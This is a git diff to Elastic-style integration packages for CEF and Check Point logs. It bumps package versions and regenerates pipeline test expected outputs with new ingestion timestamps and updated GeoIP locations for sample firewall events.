b/packages/cef/changelog.yml index b670afa0320..3eac66fae17 100644 --- a/packages/cef/changelog.yml +++ b/packages/cef/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.3.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.3.0" changes: - description: Change test IPs to the supported set for GeoIP diff --git a/packages/cef/data_stream/log/_dev/test/pipeline/test-cef.log-expected.json b/packages/cef/data_stream/log/_dev/test/pipeline/test-cef.log-expected.json index 132b742de72..234e95ccdf4 100644 --- a/packages/cef/data_stream/log/_dev/test/pipeline/test-cef.log-expected.json +++ b/packages/cef/data_stream/log/_dev/test/pipeline/test-cef.log-expected.json @@ -3,7 +3,7 @@ { "message": "CEF:0|Elastic|Vaporware|1.0.0-alpha|18|Web request|low|eventId=3457 requestMethod=POST slat=38.915 slong=-77.511 proto=TCP sourceServiceName=httpd requestContext=https://www.google.com src=89.160.20.156 spt=33876 dst=192.168.10.1 dpt=443 request=https://www.example.com/cart", "event": { - "ingested": "2021-11-30T10:40:27.309239043Z" + "ingested": "2021-12-14T14:36:05.410075219Z" }, "ecs": { "version": "1.12.0" @@ -15,7 +15,7 @@ { "message": "CEF:0|Elastic|Vaporware|1.0.0-alpha|18|Authentication|low|eventId=123 src=89.160.20.156 spt=33876 dst=89.160.20.156 dpt=443 duser=alice suser=bob destinationTranslatedAddress=10.10.10.10 fileHash=bc8bbe52f041fd17318f08a0f73762ce oldFileHash=a9796280592f86b74b27e370662d41eb", "event": { - "ingested": "2021-11-30T10:40:27.309247202Z" + "ingested": "2021-12-14T14:36:05.410078262Z" }, "ecs": { "version": "1.12.0" @@ -27,7 +27,7 @@ { "message": "CEF:0|Elastic|Vaporware|1.0.0-alpha|18|Authentication|low|spriv=user dpriv=root", "event": { - "ingested": "2021-11-30T10:40:27.309249571Z" + "ingested": "2021-12-14T14:36:05.410078773Z" }, "ecs": { "version": "1.12.0" @@ -39,7 +39,7 @@ { "message": "CEF:0|Elastic|Vaporware|1.0.0-alpha|18|Authentication|low|message=This event is padded with whitespace dst=192.168.1.2 src=192.168.3.4 ", "event": { - "ingested": "2021-11-30T10:40:27.309251218Z" + "ingested": "2021-12-14T14:36:05.410079187Z" }, "ecs": { "version": "1.12.0" diff --git a/packages/cef/data_stream/log/_dev/test/pipeline/test-checkpoint.log-expected.json b/packages/cef/data_stream/log/_dev/test/pipeline/test-checkpoint.log-expected.json index 6533d7fa083..7c69ffe43c8 100644 --- a/packages/cef/data_stream/log/_dev/test/pipeline/test-checkpoint.log-expected.json +++ b/packages/cef/data_stream/log/_dev/test/pipeline/test-checkpoint.log-expected.json @@ -3,7 +3,7 @@ { "message": "CEF:0|Check Point|VPN-1 \u0026 FireWall-1|Check Point|Log|https|Unknown|act=Accept destinationTranslatedAddress=0.0.0.0 destinationTranslatedPort=0 deviceDirection=0 rt=1543270652000 sourceTranslatedAddress=192.168.103.254 sourceTranslatedPort=35398 spt=49363 dpt=443 cs2Label=Rule Name layer_name=Network layer_uuid=b406b732-2437-4848-9741-6eae1f5bf112 match_id=4 parent_rule=0 rule_action=Accept rule_uid=9e5e6e74-aa9a-4693-b9fe-53712dd27bea ifname=eth0 logid=0 loguid={0x5bfc70fc,0x1,0xfe65a8c0,0xc0000001} origin=192.168.101.254 originsicname=CN\\=R80,O\\=R80_M..6u6bdo sequencenum=1 version=5 dst=89.160.20.156 inzone=Internal nat_addtnl_rulenum=1 nat_rulenum=4 outzone=External product=VPN-1 \u0026 FireWall-1 proto=6 service_id=https src=192.168.101.100 cs5Label=Matched Category cs5=Business / Economy deviceCustomDate2=1508150533713 deviceCustomDate2Label=This field is made up", "event": { - "ingested": "2021-11-30T10:40:27.407370409Z" + "ingested": "2021-12-14T14:36:05.483183067Z" }, "ecs": { "version": "1.12.0" @@ -15,7 +15,7 @@ { "message": "CEF:0|Check Point|VPN-1 \u0026 FireWall-1|Check Point|Log|https|Unknown|act=Bypass cn1Label=Email Recipients Number cs1Label=Email ID cs4Label=Email Control cs4=SMTP Policy Restrictions cs5Label=Email Session ID deviceDirection=0 msg=Encrypted session rt=1545211330000 spt=4001 dpt=25 fileHash=55f4a511e6f630a6b1319505414f114e7bcaf13d deviceCustomDate2=Apr 11 2020 10:42:13 deviceCustomDate2Label=Subscription expiration", "event": { - "ingested": "2021-11-30T10:40:27.407374562Z" + "ingested": "2021-12-14T14:36:05.483185855Z" }, "ecs": { "version": "1.12.0" @@ -27,7 +27,7 @@ { "message": "CEF:0|Check Point|VPN-1 \u0026 FireWall-1|Check Point|Log|https|Unknown|act=Drop cp_app_risk=High cp_severity=Very-High baseEventCount=12 deviceFacility=4 c6a2=fd00::555 c6a2Label=Source IPv6 Address c6a3=::1 c6a3Label=Destination IPv6 Address fileHash=580a783c1cb2b20613323f715d231a69 cn2=5 cn2Label=Duration in Seconds", "event": { - "ingested": "2021-11-30T10:40:27.407376023Z" + "ingested": "2021-12-14T14:36:05.483186326Z" }, "ecs": { "version": "1.12.0" diff --git a/packages/cef/data_stream/log/_dev/test/pipeline/test-fp-ngfw-smc.log-expected.json b/packages/cef/data_stream/log/_dev/test/pipeline/test-fp-ngfw-smc.log-expected.json index c54e875d39a..233165d455b 100644 --- a/packages/cef/data_stream/log/_dev/test/pipeline/test-fp-ngfw-smc.log-expected.json +++ b/packages/cef/data_stream/log/_dev/test/pipeline/test-fp-ngfw-smc.log-expected.json @@ -3,7 +3,7 @@ { "message": "CEF:0|FORCEPOINT|Firewall|6.6.1|0|Generic|0|deviceExternalId=Master FW node 1 dvc=10.1.1.40 dvchost=10.1.1.40 msg=log server connection established deviceFacility=Logging System rt=Jan 17 2020 08:52:10", "event": { - "ingested": "2021-11-30T10:40:27.470992012Z" + "ingested": "2021-12-14T14:36:05.543866182Z" }, "ecs": { "version": "1.12.0" @@ -15,7 +15,7 @@ { "message": "CEF:0|FORCEPOINT|Firewall|6.6.1|9005|FW_Communication-Communication-Error|0|deviceExternalId=Master FW node 1 dvc=10.1.1.40 dvchost=10.1.1.40 msg=Communication error: No route to host (-3, 5, 0) deviceFacility=Management rt=Jan 17 2020 08:52:09", "event": { - "ingested": "2021-11-30T10:40:27.470995241Z" + "ingested": "2021-12-14T14:36:05.543868410Z" }, "ecs": { "version": "1.12.0" @@ -27,7 +27,7 @@ { "message": "CEF:0|FORCEPOINT|Firewall|6.6.1|70018|Connection_Allowed|0|deviceExternalId=Master FW node 1 dvc=10.1.1.40 dvchost=10.1.1.40 src=10.37.205.252 dst=10.1.1.40 proto=1 deviceOutboundInterface=255 act=Allow msg=Referred connection: 10.1.1.40 -\u003e 10.37.133.35 frag\\=0x4000 TCP 47413-\u003e3020 deviceFacility=Packet Filtering rt=Jan 17 2020 08:52:09 app=Dest. Unreachable (Host Unreachable) cs1Label=RuleID cs1=2097157.1", "event": { - "ingested": "2021-11-30T10:40:27.470996518Z" + "ingested": "2021-12-14T14:36:05.543868822Z" }, "ecs": { "version": "1.12.0" @@ -39,7 +39,7 @@ { "message": "CEF:0|FORCEPOINT|Firewall|unknown|70019|Connection_Discarded|0|deviceExternalId=Firewall-10 node 1 dvc=10.1.1.10 dvchost=10.1.1.10 src=172.16.1.1 dst=89.160.20.156 spt=68 dpt=67 proto=17 deviceOutboundInterface=255 deviceFacility=Packet Filtering rt=Jan 17 2020 08:56:21 app=BOOTPS (UDP) cs1Label=RuleID cs1=605.0", "event": { - "ingested": "2021-11-30T10:40:27.470997749Z" + "ingested": "2021-12-14T14:36:05.543869193Z" }, "ecs": { "version": "1.12.0" @@ -51,7 +51,7 @@ { "message": "CEF:0|FORCEPOINT|Firewall|unknown|70020|Connection_Refused|0|deviceExternalId=Firewall-1 node 1 dvc=10.1.1.1 dvchost=10.1.1.1 src=172.16.1.1 dst=192.168.1.1 proto=1 deviceOutboundInterface=255 act=Refuse deviceFacility=Packet Filtering rt=Jan 17 2020 08:56:23 app=Echo Request (No Code) cs1Label=RuleID cs1=601.0", "event": { - "ingested": "2021-11-30T10:40:27.470998886Z" + "ingested": "2021-12-14T14:36:05.543869564Z" }, "ecs": { "version": "1.12.0" @@ -63,7 +63,7 @@ { "message": "CEF:0|FORCEPOINT|Firewall|unknown|70021|Connection_Closed|0|deviceExternalId=Firewall-6 node 1 dvc=10.1.1.6 dvchost=10.1.1.6 proto=6 deviceOutboundInterface=255 destinationServiceName=YouTube suser=alice deviceFacility=Packet Filtering rt=Jan 17 2020 08:56:20 app=TCP in=32526 out=27366", "event": { - "ingested": "2021-11-30T10:40:27.471000023Z" + "ingested": "2021-12-14T14:36:05.543873586Z" }, "ecs": { "version": "1.12.0" @@ -75,7 +75,7 @@ { "message": "CEF:0|FORCEPOINT|Firewall|unknown|72714|ECA_Metadata_login|0|deviceExternalId=Firewall-3 node 1 dvc=10.1.1.3 dvchost=10.1.1.3 src=192.168.1.1 suser=bob deviceFacility=Endpoint Context Agent rt=Jan 17 2020 08:56:33", "event": { - "ingested": "2021-11-30T10:40:27.471001127Z" + "ingested": "2021-12-14T14:36:05.543874034Z" }, "ecs": { "version": "1.12.0" @@ -87,7 +87,7 @@ { "message": "CEF:0|FORCEPOINT|Firewall|unknown|72715|ECA_Metadata_logout|0|deviceExternalId=Firewall-10 node 1 dvc=10.1.1.10 dvchost=10.1.1.10 src=192.168.1.1 suser=bob deviceFacility=Endpoint Context Agent rt=Jan 17 2020 08:56:31", "event": { - "ingested": "2021-11-30T10:40:27.471002228Z" + "ingested": "2021-12-14T14:36:05.543874404Z" }, "ecs": { "version": "1.12.0" @@ -99,7 +99,7 @@ { "message": "CEF:0|FORCEPOINT|Firewall|unknown|72716|ECA_Metadata_system_metadata_received|0|deviceExternalId=Firewall-8 node 1 dvc=10.1.1.8 dvchost=10.1.1.8 src=172.16.2.1 suser=alice deviceFacility=Endpoint Context Agent rt=Jan 17 2020 08:56:26", "event": { - "ingested": "2021-11-30T10:40:27.471003434Z" + "ingested": "2021-12-14T14:36:05.543874760Z" }, "ecs": { "version": "1.12.0" @@ -111,7 +111,7 @@ { "message": "CEF:0|FORCEPOINT|Firewall|6.6.1|78002|TLS connection state|0|deviceExternalId=Master FW node 1 dvc=10.1.1.40 dvchost=10.1.1.40 msg=TLS: Couldn't establish TLS connection (11, N/A) deviceFacility=Management rt=Jan 17 2020 08:52:09", "event": { - "ingested": "2021-11-30T10:40:27.471004573Z" + "ingested": "2021-12-14T14:36:05.543875120Z" }, "ecs": { "version": "1.12.0" @@ -123,7 +123,7 @@ { "message": "", "event": { - "ingested": "2021-11-30T10:40:27.471010758Z" + "ingested": "2021-12-14T14:36:05.543875476Z" }, "ecs": { "version": "1.12.0" @@ -135,7 +135,7 @@ { "message": "", "event": { - "ingested": "2021-11-30T10:40:27.471012805Z" + "ingested": "2021-12-14T14:36:05.543876063Z" }, "ecs": { "version": "1.12.0" @@ -147,7 +147,7 @@ { "message": "", "event": { - "ingested": "2021-11-30T10:40:27.471013991Z" + "ingested": "2021-12-14T14:36:05.543876448Z" }, "ecs": { "version": "1.12.0" diff --git a/packages/cef/manifest.yml b/packages/cef/manifest.yml index 1ed7ca1c907..a13e644d1c7 100644 --- a/packages/cef/manifest.yml +++ b/packages/cef/manifest.yml @@ -1,6 +1,6 @@ name: cef title: CEF Logs -version: 1.3.0 +version: 1.3.1 release: ga description: Collect logs from CEF Logs with Elastic Agent. type: integration diff --git a/packages/checkpoint/changelog.yml b/packages/checkpoint/changelog.yml index 305780f527d..ca6a3389ff9 100644 --- a/packages/checkpoint/changelog.yml +++ b/packages/checkpoint/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.2.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint-with-time.log-expected.json b/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint-with-time.log-expected.json index c3f9b8014f7..06f61f825aa 100644 --- a/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint-with-time.log-expected.json +++ b/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint-with-time.log-expected.json @@ -54,7 +54,7 @@ }, "event": { "sequence": 1, - "ingested": "2021-12-09T13:31:18.614546900Z", + "ingested": "2021-12-14T14:36:07.505524185Z", "original": "\u003c134\u003e1 2020-03-30T07:20:35Z gw-da58d3 CheckPoint 7776 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e819dc3,0x0,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; time:\"1594646954\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"192.168.1.153\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; outzone:\"External\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"17\"; s_port:\"43103\"; service:\"514\"; service_id:\"syslog\"; src:\"192.168.1.100\"]", "kind": "event", "action": "Accept", @@ -73,23 +73,38 @@ "checkpoint": { "action_reason_msg": "Dropped by multiportal infrastructure" }, + "observer": { + "name": "127.0.0.1", + "ingress": { + "interface": { + "name": "bond1.3999" + } + }, + "product": "VPN \u0026 FireWall", + "type": "firewall", + "vendor": "Checkpoint" + }, + "@timestamp": "2021-05-05T12:27:09.000Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "81.2.69.144", + "81.2.69.144" + ] + }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "port": 80, @@ -98,56 +113,22 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "port": 52780, "ip": "81.2.69.144" }, - "tags": [ - "preserve_original_event" - ], - "network": { - "iana_number": "6", - "direction": "inbound" - }, - "observer": { - "name": "127.0.0.1", - "ingress": { - "interface": { - "name": "bond1.3999" - } - }, - "product": "VPN \u0026 FireWall", - "type": "firewall", - "vendor": "Checkpoint" - }, - "@timestamp": "2021-05-05T12:27:09.000Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "81.2.69.144", - "81.2.69.144" - ] - }, "event": { "sequence": 62, - "ingested": "2021-12-09T13:31:18.614555700Z", + "ingested": "2021-12-14T14:36:07.505526452Z", "original": "\u003c134\u003e1 2021-05-05T12:27:09Z cp-m CheckPoint 1231 - [action:\"Drop\"; flags:\"278528\"; ifdir:\"inbound\"; ifname:\"bond1.3999\"; loguid:\"{0x60928f1d,0x8,0x40de101f,0xfcdbb197}\"; origin:\"127.0.0.1\"; originsicname:\"CN=CP,O=cp.com.9jjkfo\"; sequencenum:\"62\"; time:\"1620217629\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={F6212FB3-54CE-6344-9164-B224119E2B92};mgmt=cp-m;date=1620031791;policy_name=CP-Cluster]\"; action_reason:\"Dropped by multiportal infrastructure\"; dst:\"81.2.69.144\"; product:\"VPN \u0026 FireWall\"; proto:\"6\"; s_port:\"52780\"; service:\"80\"; src:\"81.2.69.144\"]", "kind": "event", "action": "Drop", @@ -155,6 +136,13 @@ "category": [ "network" ] + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "iana_number": "6", + "direction": "inbound" } } ] diff --git a/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint.log-expected.json b/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint.log-expected.json index 0d89f653dc7..36903c0bbd5 100644 --- a/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint.log-expected.json +++ b/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint.log-expected.json @@ -21,7 +21,7 @@ }, "event": { "sequence": 1, - "ingested": "2021-12-09T13:31:19.083259700Z", + "ingested": "2021-12-14T14:36:07.875459109Z", "original": "\u003c134\u003e1 2020-03-29T13:19:20Z gw-da58d3 CheckPoint 1930 - [flags:\"133440\"; ifdir:\"inbound\"; ifname:\"daemon\"; loguid:\"{0x5e80a059,0x0,0x6401a8c0,0x3c7878a}\"; origin:\"192.168.1.100\"; sequencenum:\"1\"; version:\"5\"; product:\"System Monitor\"; sys_message::\"The eth0 interface is not protected by the anti-spoofing feature. Your network may be at risk\"]", "id": "{0x5e80a059,0x0,0x6401a8c0,0x3c7878a}", "category": [ @@ -57,7 +57,7 @@ }, "event": { "sequence": 2, - "ingested": "2021-12-09T13:31:19.083263700Z", + "ingested": "2021-12-14T14:36:07.875461285Z", "original": "\u003c134\u003e1 2020-03-29T13:19:21Z gw-da58d3 CheckPoint 1930 - [flags:\"133440\"; ifdir:\"inbound\"; ifname:\"daemon\"; loguid:\"{0x5e80a059,0x2,0x6401a8c0,0x3c7878a}\"; origin:\"192.168.1.100\"; sequencenum:\"2\"; version:\"5\"; product:\"System Monitor\"; sys_message::\"installed Standard\"]", "id": "{0x5e80a059,0x2,0x6401a8c0,0x3c7878a}", "category": [ @@ -126,7 +126,7 @@ }, "event": { "sequence": 1, - "ingested": "2021-12-09T13:31:19.083267900Z", + "ingested": "2021-12-14T14:36:07.875461740Z", "original": "\u003c134\u003e1 2020-03-29T13:19:22Z gw-da58d3 CheckPoint 1930 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e80a05a,0x0,0x60e0fe3b,0xda019994}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={DF903A6D-B97D-1A4D-A054-2BF3A330CB5A};mgmt=gw-da58d3;date=1585487925;policy_name=Standard\\]\"; dst:\"192.168.1.1\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; outzone:\"Internal\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"17\"; s_port:\"46915\"; service:\"53\"; service_id:\"domain-udp\"; src:\"192.168.1.100\"]", "kind": "event", "action": "Accept", @@ -153,20 +153,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "port": 443, @@ -218,7 +212,7 @@ }, "event": { "sequence": 2, - "ingested": "2021-12-09T13:31:19.083271700Z", + "ingested": "2021-12-14T14:36:07.875462151Z", "original": "\u003c134\u003e1 2020-03-29T13:19:22Z gw-da58d3 CheckPoint 1930 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e80a05a,0x0,0xbba3afa,0xd2c10858}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"2\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={DF903A6D-B97D-1A4D-A054-2BF3A330CB5A};mgmt=gw-da58d3;date=1585487925;policy_name=Standard\\]\"; dst:\"81.2.69.144\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; nat_addtnl_rulenum:\"0\"; nat_rulenum:\"0\"; outzone:\"Internal\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"6\"; s_port:\"61794\"; service:\"443\"; service_id:\"https\"; src:\"192.168.1.100\"; xlatedport:\"0\"; xlatedst:\"0.0.0.0\"; xlatesport:\"26680\"; xlatesrc:\"0.0.0.0\"]", "kind": "event", "action": "Accept", @@ -287,7 +281,7 @@ }, "event": { "sequence": 3, - "ingested": "2021-12-09T13:31:19.083278100Z", + "ingested": "2021-12-14T14:36:07.875462546Z", "original": "\u003c134\u003e1 2020-03-29T13:19:22Z gw-da58d3 CheckPoint 1930 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e80a05a,0x0,0x1cae0484,0xf99c33e9}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"3\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={DF903A6D-B97D-1A4D-A054-2BF3A330CB5A};mgmt=gw-da58d3;date=1585487925;policy_name=Standard\\]\"; dst:\"192.168.1.1\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; outzone:\"Internal\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"17\"; s_port:\"36749\"; service:\"53\"; service_id:\"domain-udp\"; src:\"192.168.1.100\"]", "kind": "event", "action": "Accept", @@ -320,7 +314,7 @@ }, "event": { "sequence": 1, - "ingested": "2021-12-09T13:31:19.083282500Z", + "ingested": "2021-12-14T14:36:07.875462931Z", "original": "\u003c134\u003e1 2020-03-29T23:18:44Z gw-da58d3 CheckPoint 8363 - [flags:\"133440\"; ifdir:\"inbound\"; loguid:\"{0x5e812cd4,0x1,0x6401a8c0,0x108620ab}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; comment:\"No update was found\"; description:\"Contracts\"; product:\"Security Gateway/Management\"; status:\"Finished\"; update_service:\"1\"; version:\"1.0\"]", "id": "{0x5e812cd4,0x1,0x6401a8c0,0x108620ab}", "category": [ @@ -347,20 +341,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "port": 80, @@ -412,7 +400,7 @@ }, "event": { "sequence": 8, - "ingested": "2021-12-09T13:31:19.083286800Z", + "ingested": "2021-12-14T14:36:07.875463340Z", "original": "\u003c134\u003e1 2020-03-29T23:18:43Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e812cd3,0x6,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"8\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"81.2.69.144\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; nat_addtnl_rulenum:\"0\"; nat_rulenum:\"0\"; outzone:\"External\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"6\"; s_port:\"61180\"; service:\"80\"; service_id:\"http\"; src:\"192.168.1.100\"; xlatedport:\"0\"; xlatedst:\"0.0.0.0\"; xlatesport:\"10860\"; xlatesrc:\"0.0.0.0\"]", "kind": "event", "action": "Accept", @@ -439,20 +427,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "port": 53, @@ -497,7 +479,7 @@ }, "event": { "sequence": 1, - "ingested": "2021-12-09T13:31:19.083347300Z", + "ingested": "2021-12-14T14:36:07.875463730Z", "original": "\u003c134\u003e1 2020-03-29T23:18:53Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; conn_direction:\"Outgoing\"; flags:\"6703366\"; ifdir:\"inbound\"; ifname:\"eth1\"; logid:\"0\"; loguid:\"{0x5e812cdd,0x0,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"81.2.69.144\"; log_delay:\"1585523933\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"17\"; s_port:\"55039\"; service:\"53\"; service_id:\"domain-udp\"; src:\"192.168.2.2\"]", "kind": "event", "action": "Accept", @@ -529,7 +511,7 @@ }, "event": { "sequence": 1, - "ingested": "2021-12-09T13:31:19.083353400Z", + "ingested": "2021-12-14T14:36:07.875464124Z", "original": "\u003c134\u003e1 2020-03-30T01:18:44Z gw-da58d3 CheckPoint 8363 - [flags:\"133440\"; ifdir:\"inbound\"; loguid:\"{0x5e8148f5,0x0,0x6401a8c0,0x108620ab}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; description:\"Contracts\"; product:\"Security Gateway/Management\"; status:\"Started\"; update_service:\"1\"; version:\"1.0\"]", "id": "{0x5e8148f5,0x0,0x6401a8c0,0x108620ab}", "category": [ @@ -556,20 +538,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "port": 80, @@ -621,7 +597,7 @@ }, "event": { "sequence": 2, - "ingested": "2021-12-09T13:31:19.083357600Z", + "ingested": "2021-12-14T14:36:07.875464526Z", "original": "\u003c134\u003e1 2020-03-30T01:18:46Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e8148f6,0x1,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"2\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"81.2.69.144\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; nat_addtnl_rulenum:\"0\"; nat_rulenum:\"0\"; outzone:\"External\"; product:\"VPN-1 \u0026 FireWall-1\"; 